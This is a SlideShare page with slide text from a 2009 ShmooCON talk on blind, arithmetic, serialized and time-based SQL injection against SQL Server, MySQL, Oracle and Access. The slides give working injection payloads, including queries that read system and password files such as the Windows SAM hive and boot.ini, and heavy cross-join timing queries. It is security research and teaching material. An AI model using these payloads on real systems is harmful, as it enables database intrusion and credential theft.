SlideShare uma empresa Scribd logo

ShmooCON 2009 : Re-playing with (Blind) SQL Injection

Transferir como PPT, PDF
Chema Alonso
Chema Alonso

Talk delivered by Chema Alonso & Jose Palazon "Palako" in ShmooCON 2009 at Washington about SQL Injection, Blind SQL Injection, Time-Based Blind SQL Injection, RFD (Remote File Downloading) and Serialized SQL Injection. http://www.slideshare.net/chemai64/timebased-blind-sql-injection-using-heavy-queries-34887073

Tecnologia
1 de 54
(Re) Playing with (Blind) SQL Injection José Palazón “Palako” Mobile Security at Yahoo! Chema Alonso Informatica64 Microsoft MVP Enterprise Security
Spain (…not only bulls…)
SQL Injection attacks http://www.phrack.org/issues.html?id=8&issue=54 A long time ago, in a galaxy far, far away…
Agenda • Serialized SQL Injection – Demo: XML Extractor • Arithmetic SQL Injection – Divide by Zero – Sums and subtractions – Type oveflow – Demo • Remote File Downloading using Blind SQL Injection – SQL Sever – MySQL – Oracle – Demo: RFD Tool • Time-Based Blind SQL Injection using heavy queries – Demo: Marathon Tool
Serialized SQL Injection
Serialized SQL Injection • Goal: To Merge complex resultsets in a single showable field • XML serialization functions allow to convert a resultset into a one XML string. • It´s possible to download big amount of data with single and simple injections.
SQL Server • FOR XML: Retrieves data as a single string representing an XML tree. • RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />. • BINARY BASE64: The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified. – union select '1','2','3',(select * from sysusers for xml raw, binary base64) • XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints. – Described by Dani Kachakil
MySQL • No default XML support, requires a server side extension • GROUP_CONCAT (v 4.1+)
Oracle • xmlforest, xmlelement,… • No * support
Demo: Serialized SQL Injection
Arithmetic Blind SQL Injection
Blind Attacks • Attacker injects code but can´t access directly to the data. • However this injection changes the behavior of the web application. • Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. – Blind SQL Injection – Biind Xpath Injection – Blind LDAP Injection
Blind SQL Injection Attacks • Attacker injects: – “True where clauses” – “False where clauses“ – Ex: • Program.php?id=1 and 1=1 • Program.php?id=1 and 1=2 • Program doesn’t return any visible data from database or data in error messages. • The attacker can´t see any data extracted from the database.
Blind SQL Injection Attacks • Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: – Different hashes – Different html structure – Different patterns (keywords) – Different linear ASCII sums – “Different behavior” • By example: Response Time
Blind SQL Injection Attacks • If any difference exists, then: – Attacker can extract all information from database – How? Using “booleanization” • MySQL: – Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) » “True-Answer Page” or “False-Answer Page”? • MSSQL: – Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) • Oracle: – Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)
Arithmetic Blind SQL Injection • The query force the parameter to be numeric – SELECT field FROM table WHERE id=abs(param) • Boolean logic is created with math operations – Divide by zero – Sums and subtractions – Type overflows
Arithmetic Blind SQL Injection • Divide by zero (David Litchfield) – Id=A+(1/(ASCII(B)-C)) •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] – When ASCII(B)=C, the DB will generate a divide by zero exception.
Arithmetic Blind SQL Injection • Sums and subtractions – Id=A+ASCII(B)-C •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] – When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A
Arithmetic Blind SQL Injection • Value type overflow – Id=A+((C/ASCII(B))*(K)) •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] •K-> Value that overflows the type defined for A –(e.g. if A is integer, then K=2^32) – When C/ASCII(B)==1, K*1 overflows the data type
Demo: • Divide by zero • Sums and subtractions • Integer overflow
Remote File Downloading using Blind SQL Injection techniques
Accessing Files • Two ways: – Load the file in a temp table • and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ?? – Load the file in the query • With every query the file is loaded in memory • I am very sorry, engine  • and i>ASCII(Substring(load_file(file,pos,1))??
SQL Server 2K - External Data Sources • Only for known filetypes: – Access trough Drivers: Txt, csv, xls, mdb, log – And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:;','select top 1 * from c:dirtarget.txt’),1,1)) • Privileges – HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerProvidersDisall owAdhocAccess=0 – By default this key doesn´t exist so only users with Server Admin Role can use these functions. • NTFS permissions
SQL Server 2K – Bulk option • Access to any file – ; Create Table TempTable as (row varchar(8000)) -- – ; Bulk Insert TempTable From 'c:file.ext' With (FIELDTERMINATOR = 'n', ROWTERMINATOR = 'n‘) -- – ; alter table TempTable add num int IDENTITY(1,1) NOT NULL – – and (select COUNT(row) from TempTable) – and (select top 1 len(row) from TempTable where num = rownum) – and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) – ; Drop Table TempTable-- • Privileges needed – Server Role: Bulkadmin – Database Role: db_owner o db_ddladmin • NTFS permissions
SQL Server 2k5 – 2k8 • OPENDATASOURCE and OPENROWSET supported • Bulk options improved – AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:windowsrepairsam', SINGLE_BLOB) As Data), 1, 1))— • Permisions • Bulkadmin Server Role • External Data Sources enabled • Sp_configure • Surface configuration Tool for features
MySQL • LoadFile – SELECT LOAD_FILE(0x633A5C626F6F742E696E69) • SQLbfTools: MySQLget command (illo and dab) • http://www.reversing.org/node/view/11 • Load Data infile – ; Create table C8DFC643 (datos varchar(4000)) – ; Load data infile 'c:boot.ini' into table C8DFC643 – ; alter table C8DFC643 add column num integer auto_increment unique key – and (select count(num) from C8DFC643) – and (select length(datos) from C8DFC643 where num = 1) – and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1) – ; Drop table C8DFC643
Oracle – Plain Text files • External Tables – ; execute immediate 'Create Directory A4A9308C As ''c:'' '; end; -- – ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;-- – Only Plain Text files
Oracle – DBMS_LOB ; execute immediate ‘ DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;‘ ; end; --
Demo RFD
Time-based Blind SQL Injection using heavy queries
Time-Based Blind SQL Injection • In scenarios with no differences between “True- Answer Page” and “False-Answer Page”, time delays can be used. • Injection forces a delay in the response page when the condition injected is True. - Delay functions: • SQL Server: waitfor • Oracle: dbms_lock.sleep • MySQL: sleep or Benchmark Function • Postgres: pg_sleep – Ex: • ; if (exists(select * from users)) waitfor delay '0:0:5’
Exploit for Solar Empire Web Game
Deep Blind SQL Injection • Time delay depends on the wanted value. • E.g. “a”->10s. delay, “b”->11s. Delay, … • http://labs.portcullis.co.uk/application/deep-blind-
Time-Based Blind SQL Injection • What about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…? • Can we still perform an exploitation of Time- Based Blind SQL Injection Attacks?
Yes, we can!
“Where-Clause” execution order Select “whatever “ From whatever Where condition1 and condition2 - Condition1 lasts 10 seconds - Condition2 lasts 100 seconds Which condition should be executed first?
The heavy condition first Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec
The light condition first Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec
Time-Based Blind SQL Injection using Heavy Queries • Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. • It depends on how the database engine evaluates the where clauses in the query. • There are two types of database engines: – Databases without optimization process – Databases with optimization process
Time-Based Blind SQL Injection using Heavy Queries • Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. • The Cross-join injection must be heavier than the other condition. • Attacker only have to know or to guess the name of a table with select permission in the database. • Example in MSSQL: – Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
“Default” tables to construct a heavy query – Microsoft SQL Server • sysusers – Oracle • all_users – MySQL (versión 5) • information_schema.columns – Microsoft Access • MSysAccessObjects (97 & 2000 versions) • MSysAccessStorage (2003 & 2007) 41
“Default” tables to construct a heavy query • …or whatever you can guess – Clients – Customers – News – Logins – Users – Providers – ….Use your imagination…
Ex 1: MS SQL Server Query lasts 14 seconds -> True-Answer
Ex 1: MS SQL Server • Query lasts 1 second -> False-Answer
Ex 2: Oracle Query Lasts 22 seconds –> True-Answer
Ex 2: Oracle Query Lasts 1 second –> False-Answer
Ex 3: Access 2000 Query Lasts 6 seconds –> True-Answer
Ex 3: Access 2000 Query Lasts 1 second –> False-Answer
Ex 4: Access 2007 Query Lasts 39 seconds –> True-Answer
Ex 4: Access 2007 Query Lasts 1 second –> False-Answer
Marathon Tool • Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. • Schema Extraction from known databases • Extract data using heavy queries not matter in which database engine (without schema) • Developed in .NET • Source code available
Demo: Marathon Tool
Prevention: Don´t forget Bobby Tables! SANITIZE YOUR QUERIES!
¿Preguntas? • Speakers: – Chema Alonso (chema@informatica64.com) – Palako (palako@lateatral.com) • Autores – Chema Alonso (chema@informatica64.com) – Alejandro Martín (amartin@informatica64.com) – Antonio Guzmán (aguzman@urjc.es) – Daniel Kachakil (dani@kachakil.org) – José Palazón “Palako” (palako@lateatral.com) – Marta Beltran (mberltran@urjc.es)

Recomendados

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)NAVER D2
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Hacking oracle using metasploit
Hacking oracle using metasploitHacking oracle using metasploit
Hacking oracle using metasploitAlberto García Illera
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
 

Recomendados

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)NAVER D2
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Hacking oracle using metasploit
Hacking oracle using metasploitHacking oracle using metasploit
Hacking oracle using metasploitAlberto García Illera
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
 
NoSQL Exploitation Framework
NoSQL Exploitation FrameworkNoSQL Exploitation Framework
NoSQL Exploitation FrameworkFrancis Alexander
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...
Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...
Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...Lucidworks
 
Exploiting NoSQL Like Never Before
Exploiting NoSQL Like Never BeforeExploiting NoSQL Like Never Before
Exploiting NoSQL Like Never BeforeFrancis Alexander
 
SQL Injection
SQL InjectionSQL Injection
SQL Injectionguest378d3c
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Automate that
Automate thatAutomate that
Automate thatAtlassian
 
Owasp Hacker Secrets Barcamp
Owasp Hacker Secrets BarcampOwasp Hacker Secrets Barcamp
Owasp Hacker Secrets Barcampsharmishtha
 
SQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
SQL Injection Attack Detection and Prevention Techniques to Secure Web-SiteSQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
SQL Injection Attack Detection and Prevention Techniques to Secure Web-Siteijtsrd
 
Battle of the Giants round 2
Battle of the Giants round 2Battle of the Giants round 2
Battle of the Giants round 2Rafał Kuć
 
Sql server infernals
Sql server infernalsSql server infernals
Sql server infernalsGianluca Sartori
 
Pentesting iOS Apps
Pentesting iOS AppsPentesting iOS Apps
Pentesting iOS AppsHerman Duarte
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionPaul Ionescu
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
Introduction to Apache Solr
Introduction to Apache SolrIntroduction to Apache Solr
Introduction to Apache SolrChristos Manios
 
Everyone Matters In Infosec 2014
Everyone Matters In Infosec 2014Everyone Matters In Infosec 2014
Everyone Matters In Infosec 2014Micah Hoffman
 
From zero to hero - Easy log centralization with Logstash and Elasticsearch
From zero to hero - Easy log centralization with Logstash and ElasticsearchFrom zero to hero - Easy log centralization with Logstash and Elasticsearch
From zero to hero - Easy log centralization with Logstash and ElasticsearchRafał Kuć
 
Introduction to Apache solr
Introduction to Apache solrIntroduction to Apache solr
Introduction to Apache solrKnoldus Inc.
 
Rapid Prototyping with Solr
Rapid Prototyping with SolrRapid Prototyping with Solr
Rapid Prototyping with SolrErik Hatcher
 
Building your own search engine with Apache Solr
Building your own search engine with Apache SolrBuilding your own search engine with Apache Solr
Building your own search engine with Apache SolrBiogeeks
 
WebBrowsing Fingerprinting y Privacidad en entornos de Big Data
WebBrowsing Fingerprinting y Privacidad en entornos de Big DataWebBrowsing Fingerprinting y Privacidad en entornos de Big Data
WebBrowsing Fingerprinting y Privacidad en entornos de Big DataChema Alonso
 
Latch Security Scenarios
Latch Security ScenariosLatch Security Scenarios
Latch Security ScenariosChema Alonso
 

Mais conteúdo relacionado

Mais procurados

NoSQL Exploitation Framework
NoSQL Exploitation FrameworkNoSQL Exploitation Framework
NoSQL Exploitation FrameworkFrancis Alexander
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...
Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...
Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...Lucidworks
 
Exploiting NoSQL Like Never Before
Exploiting NoSQL Like Never BeforeExploiting NoSQL Like Never Before
Exploiting NoSQL Like Never BeforeFrancis Alexander
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Automate that
Automate thatAutomate that
Automate thatAtlassian
 
Owasp Hacker Secrets Barcamp
Owasp Hacker Secrets BarcampOwasp Hacker Secrets Barcamp
Owasp Hacker Secrets Barcampsharmishtha
 
SQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
SQL Injection Attack Detection and Prevention Techniques to Secure Web-SiteSQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
SQL Injection Attack Detection and Prevention Techniques to Secure Web-Siteijtsrd
 
Battle of the Giants round 2
Battle of the Giants round 2Battle of the Giants round 2
Battle of the Giants round 2Rafał Kuć
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionPaul Ionescu
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
Introduction to Apache Solr
Introduction to Apache SolrIntroduction to Apache Solr
Introduction to Apache SolrChristos Manios
 
Everyone Matters In Infosec 2014
Everyone Matters In Infosec 2014Everyone Matters In Infosec 2014
Everyone Matters In Infosec 2014Micah Hoffman
 
From zero to hero - Easy log centralization with Logstash and Elasticsearch
From zero to hero - Easy log centralization with Logstash and ElasticsearchFrom zero to hero - Easy log centralization with Logstash and Elasticsearch
From zero to hero - Easy log centralization with Logstash and ElasticsearchRafał Kuć
 
Introduction to Apache solr
Introduction to Apache solrIntroduction to Apache solr
Introduction to Apache solrKnoldus Inc.
 
Rapid Prototyping with Solr
Rapid Prototyping with SolrRapid Prototyping with Solr
Rapid Prototyping with SolrErik Hatcher
 
Building your own search engine with Apache Solr
Building your own search engine with Apache SolrBuilding your own search engine with Apache Solr
Building your own search engine with Apache SolrBiogeeks
 

Mais procurados (20)

NoSQL Exploitation Framework
NoSQL Exploitation FrameworkNoSQL Exploitation Framework
NoSQL Exploitation Framework
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection Exploited
 
Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...
Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...
Solr Security: Tips and Tricks and Things You Really Ought to Know - Kevin Co...
 
Exploiting NoSQL Like Never Before
Exploiting NoSQL Like Never BeforeExploiting NoSQL Like Never Before
Exploiting NoSQL Like Never Before
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
Automate that
Automate thatAutomate that
Automate that
 
Owasp Hacker Secrets Barcamp
Owasp Hacker Secrets BarcampOwasp Hacker Secrets Barcamp
Owasp Hacker Secrets Barcamp
 
SQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
SQL Injection Attack Detection and Prevention Techniques to Secure Web-SiteSQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
SQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
 
Battle of the Giants round 2
Battle of the Giants round 2Battle of the Giants round 2
Battle of the Giants round 2
 
Sql server infernals
Sql server infernalsSql server infernals
Sql server infernals
 
Pentesting iOS Apps
Pentesting iOS AppsPentesting iOS Apps
Pentesting iOS Apps
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 Injection
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
Introduction to Apache Solr
Introduction to Apache SolrIntroduction to Apache Solr
Introduction to Apache Solr
 
Everyone Matters In Infosec 2014
Everyone Matters In Infosec 2014Everyone Matters In Infosec 2014
Everyone Matters In Infosec 2014
 
From zero to hero - Easy log centralization with Logstash and Elasticsearch
From zero to hero - Easy log centralization with Logstash and ElasticsearchFrom zero to hero - Easy log centralization with Logstash and Elasticsearch
From zero to hero - Easy log centralization with Logstash and Elasticsearch
 
Introduction to Apache solr
Introduction to Apache solrIntroduction to Apache solr
Introduction to Apache solr
 
Rapid Prototyping with Solr
Rapid Prototyping with SolrRapid Prototyping with Solr
Rapid Prototyping with Solr
 
Building your own search engine with Apache Solr
Building your own search engine with Apache SolrBuilding your own search engine with Apache Solr
Building your own search engine with Apache Solr
 

Destaque

WebBrowsing Fingerprinting y Privacidad en entornos de Big Data
WebBrowsing Fingerprinting y Privacidad en entornos de Big DataWebBrowsing Fingerprinting y Privacidad en entornos de Big Data
WebBrowsing Fingerprinting y Privacidad en entornos de Big DataChema Alonso
 
Latch Security Scenarios
Latch Security ScenariosLatch Security Scenarios
Latch Security ScenariosChema Alonso
 
Digital latches for your digital Life
Digital latches for your digital LifeDigital latches for your digital Life
Digital latches for your digital LifeChema Alonso
 
Ataques XSS Google Persistentes
Ataques XSS Google PersistentesAtaques XSS Google Persistentes
Ataques XSS Google PersistentesChema Alonso
 
RootedCON 2014: Playing and Hacking with Digital Latches
RootedCON 2014: Playing and Hacking with Digital LatchesRootedCON 2014: Playing and Hacking with Digital Latches
RootedCON 2014: Playing and Hacking with Digital LatchesChema Alonso
 
Codemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL InjectionCodemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL InjectionChema Alonso
 
XSS Google Persistentes
XSS Google PersistentesXSS Google Persistentes
XSS Google PersistentesChema Alonso
 
El juego es el mismo
El juego es el mismoEl juego es el mismo
El juego es el mismoChema Alonso
 
X Fórum AUSAPE 2014: Un Decálogo de Seguridad Máligna
X Fórum AUSAPE 2014: Un Decálogo de Seguridad MálignaX Fórum AUSAPE 2014: Un Decálogo de Seguridad Máligna
X Fórum AUSAPE 2014: Un Decálogo de Seguridad MálignaChema Alonso
 
Ingenieros y hackers
Ingenieros y hackersIngenieros y hackers
Ingenieros y hackersChema Alonso
 
Codemotion ES 2014: Love Always Takes Care & Humility
Codemotion ES 2014: Love Always Takes Care & HumilityCodemotion ES 2014: Love Always Takes Care & Humility
Codemotion ES 2014: Love Always Takes Care & HumilityChema Alonso
 
Tu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsTu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsChema Alonso
 
Dorking & Pentesting with Tacyt
Dorking & Pentesting with TacytDorking & Pentesting with Tacyt
Dorking & Pentesting with TacytChema Alonso
 
CyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitCyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitChema Alonso
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Chema Alonso
 
No me indexes que me cacheo
No me indexes que me cacheoNo me indexes que me cacheo
No me indexes que me cacheoChema Alonso
 
It's a Kind of Magic
It's a Kind of MagicIt's a Kind of Magic
It's a Kind of MagicChema Alonso
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataCazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataChema Alonso
 
Hachetetepé dos puntos SLAAC SLAAC
Hachetetepé dos puntos SLAAC SLAACHachetetepé dos puntos SLAAC SLAAC
Hachetetepé dos puntos SLAAC SLAACChema Alonso
 

Destaque (20)

WebBrowsing Fingerprinting y Privacidad en entornos de Big Data
WebBrowsing Fingerprinting y Privacidad en entornos de Big DataWebBrowsing Fingerprinting y Privacidad en entornos de Big Data
WebBrowsing Fingerprinting y Privacidad en entornos de Big Data
 
Latch Security Scenarios
Latch Security ScenariosLatch Security Scenarios
Latch Security Scenarios
 
Digital latches for your digital Life
Digital latches for your digital LifeDigital latches for your digital Life
Digital latches for your digital Life
 
Ataques XSS Google Persistentes
Ataques XSS Google PersistentesAtaques XSS Google Persistentes
Ataques XSS Google Persistentes
 
RootedCON 2014: Playing and Hacking with Digital Latches
RootedCON 2014: Playing and Hacking with Digital LatchesRootedCON 2014: Playing and Hacking with Digital Latches
RootedCON 2014: Playing and Hacking with Digital Latches
 
Codemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL InjectionCodemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL Injection
 
XSS Google Persistentes
XSS Google PersistentesXSS Google Persistentes
XSS Google Persistentes
 
El juego es el mismo
El juego es el mismoEl juego es el mismo
El juego es el mismo
 
X Fórum AUSAPE 2014: Un Decálogo de Seguridad Máligna
X Fórum AUSAPE 2014: Un Decálogo de Seguridad MálignaX Fórum AUSAPE 2014: Un Decálogo de Seguridad Máligna
X Fórum AUSAPE 2014: Un Decálogo de Seguridad Máligna
 
Ingenieros y hackers
Ingenieros y hackersIngenieros y hackers
Ingenieros y hackers
 
Codemotion ES 2014: Love Always Takes Care & Humility
Codemotion ES 2014: Love Always Takes Care & HumilityCodemotion ES 2014: Love Always Takes Care & Humility
Codemotion ES 2014: Love Always Takes Care & Humility
 
Tu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsTu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu Windows
 
Dorking & Pentesting with Tacyt
Dorking & Pentesting with TacytDorking & Pentesting with Tacyt
Dorking & Pentesting with Tacyt
 
Shuabang Botnet
Shuabang BotnetShuabang Botnet
Shuabang Botnet
 
CyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitCyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging Fruit
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7
 
No me indexes que me cacheo
No me indexes que me cacheoNo me indexes que me cacheo
No me indexes que me cacheo
 
It's a Kind of Magic
It's a Kind of MagicIt's a Kind of Magic
It's a Kind of Magic
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataCazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
 
Hachetetepé dos puntos SLAAC SLAAC
Hachetetepé dos puntos SLAAC SLAACHachetetepé dos puntos SLAAC SLAAC
Hachetetepé dos puntos SLAAC SLAAC
 

Semelhante a ShmooCON 2009 : Re-playing with (Blind) SQL Injection

ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingChema Alonso
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersChema Alonso
 
Time-Based Blind SQL Injection using Heavy Queries
